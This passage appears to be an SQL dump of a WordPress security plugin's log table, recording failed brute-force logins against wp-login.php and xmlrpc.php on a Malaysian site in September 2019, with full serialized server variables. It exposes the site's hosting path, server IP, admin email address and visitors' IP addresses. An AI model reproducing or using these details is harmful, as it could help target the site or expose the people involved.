Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.126.104\";s:11:\"REMOTE_PORT\";s:5:\"38610\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBb3NVIJ66zPtjtaf37PgAAAUU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568693212.6461\";s:12:\"REQUEST_TIME\";s:10:\"1568693212\";}}','notice','2019-09-17 04:06:54','2019-09-17 04:06:53',18257296,19554320,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.126.104'),(24383,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"48776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBdQdVIJ66zPtjtaf38aQAAAUk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568693569.0947\";s:12:\"REQUEST_TIME\";s:10:\"1568693569\";}}','notice','2019-09-17 04:12:50','2019-09-17 04:12:49',17739368,19230160,'https://bintara.com.my/wp-login.php',1,0,'119.28.180.62'),(23754,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"37425\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXufwHKp6BXM7TOrMiGpAwAAAQc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568382912.3545\";s:12:\"REQUEST_TIME\";s:10:\"1568382912\";}}','notice','2019-09-13 13:55:13','2019-09-13 13:55:12',17783904,19274160,'https://bintara.com.my/wp-login.php',1,0,'157.230.55.177'),(23755,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"38243\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXufyMTbo-ElM1a2pcExKwAAAEU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568382920.2833\";s:12:\"REQUEST_TIME\";s:10:\"1568382920\";}}','notice','2019-09-13 13:55:22','2019-09-13 13:55:20',18298552,19598760,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.55.177'),(23756,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.238.176.18\";s:11:\"REMOTE_PORT\";s:5:\"42898\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXvyrHN0XMZvd-nnEMZkAwAAANY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568404140.4302\";s:12:\"REQUEST_TIME\";s:10:\"1568404140\";}}','notice','2019-09-13 19:49:04','2019-09-13 19:49:00',18257480,19555008,'https://bintara.com.my/xmlrpc.php',1,0,'213.238.176.18'),(23757,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-13 21:08:10','2019-09-13 21:08:09',17696016,18149872,'https://bintara.com.my/zoom-meetings-chat/?gclid=Cj0KCQjw_OzrBRDmARIsAAIdQ_KrSePea6pXJY_LX1Cs0_m26nH7lhc_KmJROaV-XbDLG9zmxYQ1R60aAk0eEALw_wcB',1,0,'115.134.208.180'),(23758,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"404-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"3.0.115.255\";s:11:\"REMOTE_PORT\";s:5:\"19230\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXxBNSKPe7aTdWom1DJy6gAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568424245.471\";s:12:\"REQUEST_TIME\";s:10:\"1568424245\";}}','notice','2019-09-14 01:24:06','2019-09-14 01:24:05',17812736,19236672,'https://bintara.com.my/wp-login.php',1,0,'3.0.115.255'),(23759,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.78.134\";s:11:\"REMOTE_PORT\";s:5:\"56100\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXxE5V8@Jx@7b-lChGlz9QAAAUc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568425189.1572\";s:12:\"REQUEST_TIME\";s:10:\"1568425189\";}}','notice','2019-09-14 01:39:50','2019-09-14 01:39:49',17740904,19231248,'https://bintara.com.my/wp-login.php',1,0,'104.248.78.134'),(23760,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.78.134\";s:11:\"REMOTE_PORT\";s:5:\"56520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXxE518@Jx@7b-lChGlz@AAAAUs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568425191.9782\";s:12:\"REQUEST_TIME\";s:10:\"1568425191\";}}','notice','2019-09-14 01:39:53','2019-09-14 01:39:52',18257536,19554064,'https://bintara.com.my/xmlrpc.php',1,0,'104.248.78.134'),(24023,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"207.55.255.20\";s:11:\"REMOTE_PORT\";s:5:\"58256\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9GrAavjo3v4tJT4rvkuQAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568622252.1059\";s:12:\"REQUEST_TIME\";s:10:\"1568622252\";}}','notice','2019-09-16 08:24:13','2019-09-16 08:24:12',17738704,19231632,'https://bintara.com.my/wp-login.php',1,0,'207.55.255.20'),(24024,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 